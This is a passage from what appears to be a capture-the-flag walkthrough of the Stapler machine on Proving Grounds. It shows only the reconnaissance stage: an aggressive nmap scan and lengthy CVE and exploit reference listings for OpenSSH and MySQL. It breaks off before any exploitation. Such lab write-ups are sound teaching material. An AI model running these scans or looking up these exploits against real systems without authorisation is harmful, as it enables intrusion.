In this walk through, we will be going through the Stapler room from Proving Grounds. This room is rated as Intermediate on the platform that has two or more routes of exploitation. One is a direct vulnerability exploitation on a vulnerable Samba server and other is through LFI on a wordpress installation via a vulnerable plugin. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Stapler |
IPaddress | 192.168.225.148 |
Difficulty | Intermediate |
OS | Linux |
Description | Stapler is an intermediate level machine that has two or more routes of exploitation. One is a direct vulnerability exploitation on a vulnerable Samba server and other is through LFI on a wordpress installation via a vulnerable plugin. |
Enumeration:
- I started off with my regular aggressive nmap scan with a -Pn flag set to skip host discovery as the machine was not responding to the ICMP ping requests. Found multiple ports opened – 21 (FTP), 22 (SSH), 80 (HTTP), 139 (Samba), 666 (Doom), 3306 (MySQL).
$ sudo nmap -Pn -A 192.168.228.148 Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-07 21:22 IST Nmap scan report for 192.168.225.148 Host is up (0.19s latency). Not shown: 993 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 550 Permission denied. | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.239 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) |_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519) | vulners: | cpe:/a:openbsd:openssh:7.2p2: | PRION:CVE-2016-8858 7.8 https://vulners.com/prion/PRION:CVE-2016-8858 | PRION:CVE-2016-6515 7.8 https://vulners.com/prion/PRION:CVE-2016-6515 | PACKETSTORM:140070 7.8 https://vulners.com/packetstorm/PACKETSTORM:140070 *EXPLOIT* | EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 7.8 https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 *EXPLOIT* | EDB-ID:40888 7.8 https://vulners.com/exploitdb/EDB-ID:40888 *EXPLOIT* | CVE-2016-8858 7.8 https://vulners.com/cve/CVE-2016-8858 | CVE-2016-6515 7.8 https://vulners.com/cve/CVE-2016-6515 | 1337DAY-ID-26494 7.8 https://vulners.com/zdt/1337DAY-ID-26494 *EXPLOIT* | SSV:92579 7.5 https://vulners.com/seebug/SSV:92579 *EXPLOIT* | PRION:CVE-2023-35784 7.5 https://vulners.com/prion/PRION:CVE-2023-35784 | PRION:CVE-2016-10009 7.5 https://vulners.com/prion/PRION:CVE-2016-10009 | PACKETSTORM:173661 7.5 https://vulners.com/packetstorm/PACKETSTORM:173661 *EXPLOIT* | CVE-2016-10009 7.5 https://vulners.com/cve/CVE-2016-10009 | 1337DAY-ID-26576 7.5 https://vulners.com/zdt/1337DAY-ID-26576 *EXPLOIT* | SSV:92582 7.2 https://vulners.com/seebug/SSV:92582 *EXPLOIT* | PRION:CVE-2016-10012 7.2 https://vulners.com/prion/PRION:CVE-2016-10012 | PRION:CVE-2015-8325 7.2 https://vulners.com/prion/PRION:CVE-2015-8325 | CVE-2016-10012 7.2 https://vulners.com/cve/CVE-2016-10012 | CVE-2015-8325 7.2 https://vulners.com/cve/CVE-2015-8325 | SSV:92580 6.9 https://vulners.com/seebug/SSV:92580 *EXPLOIT* | PRION:CVE-2016-10010 6.9 https://vulners.com/prion/PRION:CVE-2016-10010 | CVE-2016-10010 6.9 https://vulners.com/cve/CVE-2016-10010 | 1337DAY-ID-26577 6.9 https://vulners.com/zdt/1337DAY-ID-26577 *EXPLOIT* | EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT* | EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT* | EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT* | EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT* | CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111 | 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT* | 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT* | SSV:91041 5.5 https://vulners.com/seebug/SSV:91041 *EXPLOIT* | PRION:CVE-2016-3115 5.5 https://vulners.com/prion/PRION:CVE-2016-3115 | PACKETSTORM:140019 5.5 https://vulners.com/packetstorm/PACKETSTORM:140019 *EXPLOIT* | PACKETSTORM:136234 5.5 https://vulners.com/packetstorm/PACKETSTORM:136234 *EXPLOIT* | EXPLOITPACK:F92411A645D85F05BDBD274FD222226F 5.5 https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F *EXPLOIT* | EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 5.5 https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 *EXPLOIT* | EXPLOITPACK:1902C998CBF9154396911926B4C3B330 5.5 https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330 *EXPLOIT* | EDB-ID:40858 5.5 https://vulners.com/exploitdb/EDB-ID:40858 *EXPLOIT* | EDB-ID:40119 5.5 https://vulners.com/exploitdb/EDB-ID:40119 *EXPLOIT* | EDB-ID:39569 5.5 https://vulners.com/exploitdb/EDB-ID:39569 *EXPLOIT* | CVE-2016-3115 5.5 https://vulners.com/cve/CVE-2016-3115 | SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT* | PRION:CVE-2023-27567 5.0 https://vulners.com/prion/PRION:CVE-2023-27567 | PRION:CVE-2018-15919 5.0 https://vulners.com/prion/PRION:CVE-2018-15919 | PRION:CVE-2018-15473 5.0 https://vulners.com/prion/PRION:CVE-2018-15473 | PRION:CVE-2017-15906 5.0 https://vulners.com/prion/PRION:CVE-2017-15906 | PRION:CVE-2016-10708 5.0 https://vulners.com/prion/PRION:CVE-2016-10708 | PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT* | EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT* | EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT* | EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT* | EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT* | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 | CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708 | 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT* | PRION:CVE-2019-16905 4.4 https://vulners.com/prion/PRION:CVE-2019-16905 | PRION:CVE-2023-29323 4.3 https://vulners.com/prion/PRION:CVE-2023-29323 | PRION:CVE-2016-6210 4.3 https://vulners.com/prion/PRION:CVE-2016-6210 | EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF *EXPLOIT* | EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF *EXPLOIT* | EDB-ID:40136 4.3 https://vulners.com/exploitdb/EDB-ID:40136 *EXPLOIT* | EDB-ID:40113 4.3 https://vulners.com/exploitdb/EDB-ID:40113 *EXPLOIT* | CVE-2023-29323 4.3 https://vulners.com/cve/CVE-2023-29323 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2016-6210 4.3 https://vulners.com/cve/CVE-2016-6210 | 1337DAY-ID-25440 4.3 https://vulners.com/zdt/1337DAY-ID-25440 *EXPLOIT* | 1337DAY-ID-25438 4.3 https://vulners.com/zdt/1337DAY-ID-25438 *EXPLOIT* | PRION:CVE-2019-6110 4.0 https://vulners.com/prion/PRION:CVE-2019-6110 | PRION:CVE-2019-6109 4.0 https://vulners.com/prion/PRION:CVE-2019-6109 | CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110 | CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109 | PRION:CVE-2019-6111 2.6 https://vulners.com/prion/PRION:CVE-2019-6111 | PRION:CVE-2018-20685 2.6 https://vulners.com/prion/PRION:CVE-2018-20685 | CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685 | SSV:92581 2.1 https://vulners.com/seebug/SSV:92581 *EXPLOIT* | PRION:CVE-2016-10011 2.1 https://vulners.com/prion/PRION:CVE-2016-10011 | CVE-2016-10011 2.1 https://vulners.com/cve/CVE-2016-10011 | PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT* | PACKETSTORM:140261 0.0 https://vulners.com/packetstorm/PACKETSTORM:140261 *EXPLOIT* | PACKETSTORM:138006 0.0 https://vulners.com/packetstorm/PACKETSTORM:138006 *EXPLOIT* | PACKETSTORM:137942 0.0 https://vulners.com/packetstorm/PACKETSTORM:137942 *EXPLOIT* | MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 0.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT* |_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT* 80/tcp open http PHP cli server 5.5 or later |_http-title: 404 Not Found 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 666/tcp open doom? | fingerprint-strings: | NULL: | message2.jpgUT | QWux | "DL[E | #;3[ | \xf6 | u([r | qYQq | Y_?n2 | 3&M~{ | 9-a)T | L}AJ |_ .npy.9 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 | mysql-info: | Protocol: 10 | Version: 5.7.12-0ubuntu1 | Thread ID: 8 | Capabilities flags: 63487 | Some Capabilities: FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, LongPassword, SupportsTransactions, IgnoreSigpipes, ODBCClient, LongColumnFlag, Speaks41ProtocolNew, Support41Auth, SupportsCompression, InteractiveClient, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments | Status: Autocommit | Salt: d1yr\x0E*OypiEv\x12 ; \x10- T |_ Auth Plugin Name: mysql_native_password | vulners: | cpe:/a:mysql:mysql:5.7.12-0ubuntu1: | SSV:92513 10.0 https://vulners.com/seebug/SSV:92513 *EXPLOIT* | SSV:92510 10.0 https://vulners.com/seebug/SSV:92510 *EXPLOIT* | SSV:92405 10.0 https://vulners.com/seebug/SSV:92405 *EXPLOIT* | PRION:CVE-2016-6662 10.0 https://vulners.com/prion/PRION:CVE-2016-6662 | PACKETSTORM:139491 10.0 https://vulners.com/packetstorm/PACKETSTORM:139491 *EXPLOIT* | PACKETSTORM:139476 10.0 https://vulners.com/packetstorm/PACKETSTORM:139476 *EXPLOIT* | EDB-ID:40679 10.0 https://vulners.com/exploitdb/EDB-ID:40679 *EXPLOIT* | EDB-ID:40678 10.0 https://vulners.com/exploitdb/EDB-ID:40678 *EXPLOIT* | SSV:92976 7.8 https://vulners.com/seebug/SSV:92976 *EXPLOIT* | PRION:CVE-2018-2696 7.8 https://vulners.com/prion/PRION:CVE-2018-2696 | PRION:CVE-2017-3599 7.8 https://vulners.com/prion/PRION:CVE-2017-3599 | EDB-ID:41954 7.8 https://vulners.com/exploitdb/EDB-ID:41954 *EXPLOIT* | 1337DAY-ID-27705 7.8 https://vulners.com/zdt/1337DAY-ID-27705 *EXPLOIT* | PRION:CVE-2020-14760 7.5 https://vulners.com/prion/PRION:CVE-2020-14760 | PRION:CVE-2019-14540 7.5 https://vulners.com/prion/PRION:CVE-2019-14540 | PRION:CVE-2018-2647 7.5 https://vulners.com/prion/PRION:CVE-2018-2647 | PRION:CVE-2018-2612 7.5 https://vulners.com/prion/PRION:CVE-2018-2612 | PRION:CVE-2018-2562 7.5 https://vulners.com/prion/PRION:CVE-2018-2562 | PRION:CVE-2016-9843 7.5 https://vulners.com/prion/PRION:CVE-2016-9843 | PRION:CVE-2016-9841 7.5 https://vulners.com/prion/PRION:CVE-2016-9841 | PRION:CVE-2016-6664 6.9 https://vulners.com/prion/PRION:CVE-2016-6664 | 1337DAY-ID-26205 6.9 https://vulners.com/zdt/1337DAY-ID-26205 *EXPLOIT* | PRION:CVE-2021-2060 6.8 https://vulners.com/prion/PRION:CVE-2021-2060 | PRION:CVE-2021-2014 6.8 https://vulners.com/prion/PRION:CVE-2021-2014 | PRION:CVE-2020-14869 6.8 https://vulners.com/prion/PRION:CVE-2020-14869 | PRION:CVE-2020-14867 6.8 https://vulners.com/prion/PRION:CVE-2020-14867 | PRION:CVE-2018-2766 6.8 https://vulners.com/prion/PRION:CVE-2018-2766 | PRION:CVE-2018-2703 6.8 https://vulners.com/prion/PRION:CVE-2018-2703 | PRION:CVE-2018-2668 6.8 https://vulners.com/prion/PRION:CVE-2018-2668 | PRION:CVE-2018-2667 6.8 https://vulners.com/prion/PRION:CVE-2018-2667 | PRION:CVE-2018-2665 6.8 https://vulners.com/prion/PRION:CVE-2018-2665 | PRION:CVE-2018-2646 6.8 https://vulners.com/prion/PRION:CVE-2018-2646 | PRION:CVE-2018-2640 6.8 https://vulners.com/prion/PRION:CVE-2018-2640 | PRION:CVE-2018-2622 6.8 https://vulners.com/prion/PRION:CVE-2018-2622 | PRION:CVE-2018-2600 6.8 https://vulners.com/prion/PRION:CVE-2018-2600 | PRION:CVE-2018-2591 6.8 https://vulners.com/prion/PRION:CVE-2018-2591 | PRION:CVE-2018-2590 6.8 https://vulners.com/prion/PRION:CVE-2018-2590 | PRION:CVE-2018-2586 6.8 https://vulners.com/prion/PRION:CVE-2018-2586 | PRION:CVE-2018-2583 6.8 https://vulners.com/prion/PRION:CVE-2018-2583 | PRION:CVE-2018-2576 6.8 https://vulners.com/prion/PRION:CVE-2018-2576 | PRION:CVE-2018-2573 6.8 https://vulners.com/prion/PRION:CVE-2018-2573 | PRION:CVE-2018-2565 6.8 https://vulners.com/prion/PRION:CVE-2018-2565 | PRION:CVE-2016-9842 6.8 https://vulners.com/prion/PRION:CVE-2016-9842 | PRION:CVE-2016-9840 6.8 https://vulners.com/prion/PRION:CVE-2016-9840 | PRION:CVE-2016-5507 6.8 https://vulners.com/prion/PRION:CVE-2016-5507 | PRION:CVE-2016-3495 6.8 https://vulners.com/prion/PRION:CVE-2016-3495 | PRION:CVE-2016-3492 6.8 https://vulners.com/prion/PRION:CVE-2016-3492 | PRION:CVE-2021-2144 6.5 https://vulners.com/prion/PRION:CVE-2021-2144 | PRION:CVE-2017-3600 6.0 https://vulners.com/prion/PRION:CVE-2017-3600 | PRION:CVE-2017-3633 5.8 https://vulners.com/prion/PRION:CVE-2017-3633 | PRION:CVE-2022-21367 5.5 https://vulners.com/prion/PRION:CVE-2022-21367 | PRION:CVE-2020-2760 5.5 https://vulners.com/prion/PRION:CVE-2020-2760 | PRION:CVE-2019-2791 5.5 https://vulners.com/prion/PRION:CVE-2019-2791 | PRION:CVE-2019-2778 5.5 https://vulners.com/prion/PRION:CVE-2019-2778 | PRION:CVE-2019-2731 5.5 https://vulners.com/prion/PRION:CVE-2019-2731 | PRION:CVE-2019-2534 5.5 https://vulners.com/prion/PRION:CVE-2019-2534 | PRION:CVE-2018-3247 5.5 https://vulners.com/prion/PRION:CVE-2018-3247 | PRION:CVE-2018-3187 5.5 https://vulners.com/prion/PRION:CVE-2018-3187 | PRION:CVE-2018-3185 5.5 https://vulners.com/prion/PRION:CVE-2018-3185 | PRION:CVE-2018-3064 5.5 https://vulners.com/prion/PRION:CVE-2018-3064 | PRION:CVE-2018-3060 5.5 https://vulners.com/prion/PRION:CVE-2018-3060 | PRION:CVE-2018-2812 5.5 https://vulners.com/prion/PRION:CVE-2018-2812 | PRION:CVE-2018-2787 5.5 https://vulners.com/prion/PRION:CVE-2018-2787 | PRION:CVE-2018-2786 5.5 https://vulners.com/prion/PRION:CVE-2018-2786 | PRION:CVE-2017-3455 5.5 https://vulners.com/prion/PRION:CVE-2017-3455 | PRION:CVE-2017-3454 5.5 https://vulners.com/prion/PRION:CVE-2017-3454 | PRION:CVE-2017-10365 5.5 https://vulners.com/prion/PRION:CVE-2017-10365 | PRION:CVE-2020-1967 5.0 https://vulners.com/prion/PRION:CVE-2020-1967 | PRION:CVE-2019-2924 5.0 https://vulners.com/prion/PRION:CVE-2019-2924 | PRION:CVE-2019-2923 5.0 https://vulners.com/prion/PRION:CVE-2019-2923 | PRION:CVE-2019-2922 5.0 https://vulners.com/prion/PRION:CVE-2019-2922 | PRION:CVE-2019-2632 5.0 https://vulners.com/prion/PRION:CVE-2019-2632 | PRION:CVE-2017-3450 5.0 https://vulners.com/prion/PRION:CVE-2017-3450 | PRION:CVE-2017-3329 5.0 https://vulners.com/prion/PRION:CVE-2017-3329 | PRION:CVE-2018-3171 4.9 https://vulners.com/prion/PRION:CVE-2018-3171 | PRION:CVE-2018-3081 4.9 https://vulners.com/prion/PRION:CVE-2018-3081 | PRION:CVE-2018-3066 4.9 https://vulners.com/prion/PRION:CVE-2018-3066 | PRION:CVE-2017-3652 4.9 https://vulners.com/prion/PRION:CVE-2017-3652 | PRION:CVE-2017-3265 4.9 https://vulners.com/prion/PRION:CVE-2017-3265 | PRION:CVE-2019-2819 4.7 https://vulners.com/prion/PRION:CVE-2019-2819 | PRION:CVE-2019-2758 4.7 https://vulners.com/prion/PRION:CVE-2019-2758 | PRION:CVE-2023-21980 4.6 https://vulners.com/prion/PRION:CVE-2023-21980 | PRION:CVE-2016-6663 4.4 https://vulners.com/prion/PRION:CVE-2016-6663 | PRION:CVE-2016-5625 4.4 https://vulners.com/prion/PRION:CVE-2016-5625 | 1337DAY-ID-26204 4.4 https://vulners.com/zdt/1337DAY-ID-26204 *EXPLOIT* | PRION:CVE-2020-2922 4.3 https://vulners.com/prion/PRION:CVE-2020-2922 | PRION:CVE-2020-2804 4.3 https://vulners.com/prion/PRION:CVE-2020-2804 | PRION:CVE-2020-2574 4.3 https://vulners.com/prion/PRION:CVE-2020-2574 | PRION:CVE-2020-2573 4.3 https://vulners.com/prion/PRION:CVE-2020-2573 | PRION:CVE-2020-2570 4.3 https://vulners.com/prion/PRION:CVE-2020-2570 | PRION:CVE-2019-2910 4.3 https://vulners.com/prion/PRION:CVE-2019-2910 | PRION:CVE-2018-3144 4.3 https://vulners.com/prion/PRION:CVE-2018-3144 | PRION:CVE-2018-3123 4.3 https://vulners.com/prion/PRION:CVE-2018-3123 | PRION:CVE-2018-2761 4.3 https://vulners.com/prion/PRION:CVE-2018-2761 | PRION:CVE-2017-3650 4.3 https://vulners.com/prion/PRION:CVE-2017-3650 | PRION:CVE-2017-3467 4.3 https://vulners.com/prion/PRION:CVE-2017-3467 | PRION:CVE-2022-21592 4.0 https://vulners.com/prion/PRION:CVE-2022-21592 | PRION:CVE-2022-21589 4.0 https://vulners.com/prion/PRION:CVE-2022-21589 | PRION:CVE-2022-21454 4.0 https://vulners.com/prion/PRION:CVE-2022-21454 | PRION:CVE-2022-21427 4.0 https://vulners.com/prion/PRION:CVE-2022-21427 | PRION:CVE-2022-21417 4.0 https://vulners.com/prion/PRION:CVE-2022-21417 | PRION:CVE-2022-21344 4.0 https://vulners.com/prion/PRION:CVE-2022-21344 | PRION:CVE-2022-21245 4.0 https://vulners.com/prion/PRION:CVE-2022-21245 | PRION:CVE-2021-35624 4.0 https://vulners.com/prion/PRION:CVE-2021-35624 | PRION:CVE-2021-2226 4.0 https://vulners.com/prion/PRION:CVE-2021-2226 | PRION:CVE-2021-2202 4.0 https://vulners.com/prion/PRION:CVE-2021-2202 | PRION:CVE-2021-2178 4.0 https://vulners.com/prion/PRION:CVE-2021-2178 | PRION:CVE-2021-2162 4.0 https://vulners.com/prion/PRION:CVE-2021-2162 | PRION:CVE-2021-2160 4.0 https://vulners.com/prion/PRION:CVE-2021-2160 | PRION:CVE-2021-2032 4.0 https://vulners.com/prion/PRION:CVE-2021-2032 | PRION:CVE-2020-2901 4.0 https://vulners.com/prion/PRION:CVE-2020-2901 | PRION:CVE-2020-2814 4.0 https://vulners.com/prion/PRION:CVE-2020-2814 | PRION:CVE-2020-2812 4.0 https://vulners.com/prion/PRION:CVE-2020-2812 | PRION:CVE-2020-2790 4.0 https://vulners.com/prion/PRION:CVE-2020-2790 | PRION:CVE-2020-2780 4.0 https://vulners.com/prion/PRION:CVE-2020-2780 | PRION:CVE-2020-2779 4.0 https://vulners.com/prion/PRION:CVE-2020-2779 | PRION:CVE-2020-2765 4.0 https://vulners.com/prion/PRION:CVE-2020-2765 | PRION:CVE-2020-2763 4.0 https://vulners.com/prion/PRION:CVE-2020-2763 | PRION:CVE-2020-2660 4.0 https://vulners.com/prion/PRION:CVE-2020-2660 | PRION:CVE-2020-2589 4.0 https://vulners.com/prion/PRION:CVE-2020-2589 | PRION:CVE-2020-2579 4.0 https://vulners.com/prion/PRION:CVE-2020-2579 | PRION:CVE-2020-2577 4.0 https://vulners.com/prion/PRION:CVE-2020-2577 | PRION:CVE-2020-2572 4.0 https://vulners.com/prion/PRION:CVE-2020-2572 | PRION:CVE-2020-14827 4.0 https://vulners.com/prion/PRION:CVE-2020-14827 | PRION:CVE-2020-14775 4.0 https://vulners.com/prion/PRION:CVE-2020-14775 | PRION:CVE-2020-14769 4.0 https://vulners.com/prion/PRION:CVE-2020-14769 | PRION:CVE-2020-14765 4.0 https://vulners.com/prion/PRION:CVE-2020-14765 | PRION:CVE-2020-14576 4.0 https://vulners.com/prion/PRION:CVE-2020-14576 | PRION:CVE-2020-14567 4.0 https://vulners.com/prion/PRION:CVE-2020-14567 | PRION:CVE-2020-14559 4.0 https://vulners.com/prion/PRION:CVE-2020-14559 | PRION:CVE-2020-14553 4.0 https://vulners.com/prion/PRION:CVE-2020-14553 | PRION:CVE-2020-14539 4.0 https://vulners.com/prion/PRION:CVE-2020-14539 | PRION:CVE-2019-2974 4.0 https://vulners.com/prion/PRION:CVE-2019-2974 | PRION:CVE-2019-2948 4.0 https://vulners.com/prion/PRION:CVE-2019-2948 | PRION:CVE-2019-2946 4.0 https://vulners.com/prion/PRION:CVE-2019-2946 | PRION:CVE-2019-2914 4.0 https://vulners.com/prion/PRION:CVE-2019-2914 | PRION:CVE-2019-2805 4.0 https://vulners.com/prion/PRION:CVE-2019-2805 | PRION:CVE-2019-2740 4.0 https://vulners.com/prion/PRION:CVE-2019-2740 | PRION:CVE-2019-2730 4.0 https://vulners.com/prion/PRION:CVE-2019-2730 | PRION:CVE-2019-2683 4.0 https://vulners.com/prion/PRION:CVE-2019-2683 | PRION:CVE-2019-2628 4.0 https://vulners.com/prion/PRION:CVE-2019-2628 | PRION:CVE-2019-2627 4.0 https://vulners.com/prion/PRION:CVE-2019-2627 | PRION:CVE-2019-2566 4.0 https://vulners.com/prion/PRION:CVE-2019-2566 | PRION:CVE-2019-2537 4.0 https://vulners.com/prion/PRION:CVE-2019-2537 | PRION:CVE-2019-2532 4.0 https://vulners.com/prion/PRION:CVE-2019-2532 | PRION:CVE-2019-2531 4.0 https://vulners.com/prion/PRION:CVE-2019-2531 | PRION:CVE-2019-2529 4.0 https://vulners.com/prion/PRION:CVE-2019-2529 | PRION:CVE-2019-2528 4.0 https://vulners.com/prion/PRION:CVE-2019-2528 | PRION:CVE-2019-2510 4.0 https://vulners.com/prion/PRION:CVE-2019-2510 | PRION:CVE-2019-2507 4.0 https://vulners.com/prion/PRION:CVE-2019-2507 | PRION:CVE-2019-2486 4.0 https://vulners.com/prion/PRION:CVE-2019-2486 | PRION:CVE-2019-2482 4.0 https://vulners.com/prion/PRION:CVE-2019-2482 | PRION:CVE-2019-2481 4.0 https://vulners.com/prion/PRION:CVE-2019-2481 | PRION:CVE-2019-2455 4.0 https://vulners.com/prion/PRION:CVE-2019-2455 | PRION:CVE-2019-2434 4.0 https://vulners.com/prion/PRION:CVE-2019-2434 | PRION:CVE-2019-2420 4.0 https://vulners.com/prion/PRION:CVE-2019-2420 | PRION:CVE-2018-3282 4.0 https://vulners.com/prion/PRION:CVE-2018-3282 | PRION:CVE-2018-3278 4.0 https://vulners.com/prion/PRION:CVE-2018-3278 | PRION:CVE-2018-3277 4.0 https://vulners.com/prion/PRION:CVE-2018-3277 | PRION:CVE-2018-3276 4.0 https://vulners.com/prion/PRION:CVE-2018-3276 | PRION:CVE-2018-3251 4.0 https://vulners.com/prion/PRION:CVE-2018-3251 | PRION:CVE-2018-3200 4.0 https://vulners.com/prion/PRION:CVE-2018-3200 | PRION:CVE-2018-3173 4.0 https://vulners.com/prion/PRION:CVE-2018-3173 | PRION:CVE-2018-3162 4.0 https://vulners.com/prion/PRION:CVE-2018-3162 | PRION:CVE-2018-3161 4.0 https://vulners.com/prion/PRION:CVE-2018-3161 | PRION:CVE-2018-3156 4.0 https://vulners.com/prion/PRION:CVE-2018-3156 | PRION:CVE-2018-3155 4.0 https://vulners.com/prion/PRION:CVE-2018-3155 | PRION:CVE-2018-3143 4.0 https://vulners.com/prion/PRION:CVE-2018-3143 | PRION:CVE-2018-3133 4.0 https://vulners.com/prion/PRION:CVE-2018-3133 | PRION:CVE-2018-3077 4.0 https://vulners.com/prion/PRION:CVE-2018-3077 | PRION:CVE-2018-3071 4.0 https://vulners.com/prion/PRION:CVE-2018-3071 | PRION:CVE-2018-3070 4.0 https://vulners.com/prion/PRION:CVE-2018-3070 | PRION:CVE-2018-3065 4.0 https://vulners.com/prion/PRION:CVE-2018-3065 | PRION:CVE-2018-3061 4.0 https://vulners.com/prion/PRION:CVE-2018-3061 | PRION:CVE-2018-3058 4.0 https://vulners.com/prion/PRION:CVE-2018-3058 | PRION:CVE-2018-3056 4.0 https://vulners.com/prion/PRION:CVE-2018-3056 | PRION:CVE-2018-3054 4.0 https://vulners.com/prion/PRION:CVE-2018-3054 | PRION:CVE-2018-2846 4.0 https://vulners.com/prion/PRION:CVE-2018-2846 | PRION:CVE-2018-2839 4.0 https://vulners.com/prion/PRION:CVE-2018-2839 | PRION:CVE-2018-2819 4.0 https://vulners.com/prion/PRION:CVE-2018-2819 | PRION:CVE-2018-2818 4.0 https://vulners.com/prion/PRION:CVE-2018-2818 | PRION:CVE-2018-2817 4.0 https://vulners.com/prion/PRION:CVE-2018-2817 | PRION:CVE-2018-2816 4.0 https://vulners.com/prion/PRION:CVE-2018-2816 | PRION:CVE-2018-2813 4.0 https://vulners.com/prion/PRION:CVE-2018-2813 | PRION:CVE-2018-2810 4.0 https://vulners.com/prion/PRION:CVE-2018-2810 | PRION:CVE-2018-2784 4.0 https://vulners.com/prion/PRION:CVE-2018-2784 | PRION:CVE-2018-2782 4.0 https://vulners.com/prion/PRION:CVE-2018-2782 | PRION:CVE-2018-2781 4.0 https://vulners.com/prion/PRION:CVE-2018-2781 | PRION:CVE-2018-2780 4.0 https://vulners.com/prion/PRION:CVE-2018-2780 | PRION:CVE-2018-2779 4.0 https://vulners.com/prion/PRION:CVE-2018-2779 | PRION:CVE-2018-2778 4.0 https://vulners.com/prion/PRION:CVE-2018-2778 | PRION:CVE-2018-2777 4.0 https://vulners.com/prion/PRION:CVE-2018-2777 | PRION:CVE-2018-2776 4.0 https://vulners.com/prion/PRION:CVE-2018-2776 | PRION:CVE-2018-2775 4.0 https://vulners.com/prion/PRION:CVE-2018-2775 | PRION:CVE-2018-2769 4.0 https://vulners.com/prion/PRION:CVE-2018-2769 | PRION:CVE-2018-2759 4.0 https://vulners.com/prion/PRION:CVE-2018-2759 | PRION:CVE-2018-2758 4.0 https://vulners.com/prion/PRION:CVE-2018-2758 | PRION:CVE-2018-2645 4.0 https://vulners.com/prion/PRION:CVE-2018-2645 | PRION:CVE-2017-3651 4.0 https://vulners.com/prion/PRION:CVE-2017-3651 | PRION:CVE-2017-3649 4.0 https://vulners.com/prion/PRION:CVE-2017-3649 | PRION:CVE-2017-3648 4.0 https://vulners.com/prion/PRION:CVE-2017-3648 | PRION:CVE-2017-3647 4.0 https://vulners.com/prion/PRION:CVE-2017-3647 | PRION:CVE-2017-3646 4.0 https://vulners.com/prion/PRION:CVE-2017-3646 | PRION:CVE-2017-3645 4.0 https://vulners.com/prion/PRION:CVE-2017-3645 | PRION:CVE-2017-3644 4.0 https://vulners.com/prion/PRION:CVE-2017-3644 | PRION:CVE-2017-3643 4.0 https://vulners.com/prion/PRION:CVE-2017-3643 | PRION:CVE-2017-3642 4.0 https://vulners.com/prion/PRION:CVE-2017-3642 | PRION:CVE-2017-3641 4.0 